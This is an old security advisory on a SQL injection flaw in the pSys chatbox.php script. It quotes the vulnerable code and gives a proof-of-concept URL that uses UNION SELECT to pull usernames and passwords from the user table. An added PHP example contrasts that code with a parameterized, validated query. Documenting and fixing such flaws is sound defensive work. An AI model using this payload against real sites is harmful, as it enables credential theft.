psys070-sql.txt

01 Jul 2008 00:00:00 | Reported by DNX | Type: packetstorm | Source: packetstormsecurity.com

pSys v0.7.0 Alpha chatbox.php Remote SQL Injection, Discovered 22.06.2008, Vendor: http://www.powie.de, Bug: $showid in chatbox.php near line 42


Code
```
 \#'#/
(-.-)
---------------------oOO---(_)---OOo--------------------
| pSys v0.7.0 Alpha (chatbox.php) Remote SQL Injection |
| (works only with magic quotes = off) |
| coded by DNX |
--------------------------------------------------------
[!] Discovered.: DNX
[!] Vendor.....: http://www.powie.de
[!] Detected...: 22.06.2008
[!] Reported...: 23.06.2008
[!] Response...: 23.06.2008

[!] Background.: pSys is a module based PHP Script

[!] Bug........: $showid in chatbox.php near line 42

12: $showid = $_REQUEST['showid']; // Show a single ID

41: if ($showid != '') {
42: $sqlbefehl = "Select * FROM $tab_quick where id='$showid'";

[!] PoC........: http://127.0.0.1/psys/chatbox.php?showid=' union select 1,username,pwd,4,5,6,7,8 FROM ps_pfuser/*

"ps_" is default database prefix

[!] Solution...: Install updates from cvs (http://www.powie.de/cvsout)

[!] Greetingz..: h0yt3r, k1tk4t, pwndomina, e\o, daneo
```
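The concatenation on line 42 next to a hardened lookup, as an added example (not pSys code and not the vendor's CVS fix): the id is validated as an integer and bound as a parameter, so the query no longer depends on the `magic quotes` setting, which PHP removed in 5.4. Assumptions: PDO with an in-memory SQLite database stands in for the application's database, and the table `demo_quick`, its columns, and the function names are constructed for the demo.

```php
<?php
// Added example, not pSys code. Table, columns and function names are constructed.
declare(strict_types=1);

/** Pattern from the advisory: the request value is concatenated into the SQL text. */
function buildQueryVulnerable(string $table, string $showid): string
{
    return "Select * FROM $table where id='$showid'";
}

/** Hardened lookup: validate the id as a positive integer, then bind it. */
function fetchEntry(PDO $db, string $table, string $showid): ?array
{
    $id = filter_var($showid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not an integer: no query is issued at all
    }
    // The table name must come from configuration, never from the request.
    // Identifiers cannot be bound as parameters, so its shape is checked here.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $table)) {
        throw new InvalidArgumentException('unexpected table name');
    }
    $stmt = $db->prepare("SELECT * FROM $table WHERE id = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE demo_quick (id INTEGER PRIMARY KEY, msg TEXT)");
$db->exec("INSERT INTO demo_quick (id, msg) VALUES (1, 'hello')");

$tab_quick = 'demo_quick';
$hostile = "x' or '1'='1"; // constructed input containing a single quote

// Concatenated form: the quote ends the string literal and the rest becomes SQL.
echo buildQueryVulnerable($tab_quick, $hostile), "\n";

// Hardened form: a numeric id is looked up through a bound parameter;
// the hostile value fails integer validation before any SQL is built.
var_dump(fetchEntry($db, $tab_quick, '1'));
var_dump(fetchEntry($db, $tab_quick, $hostile));
```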
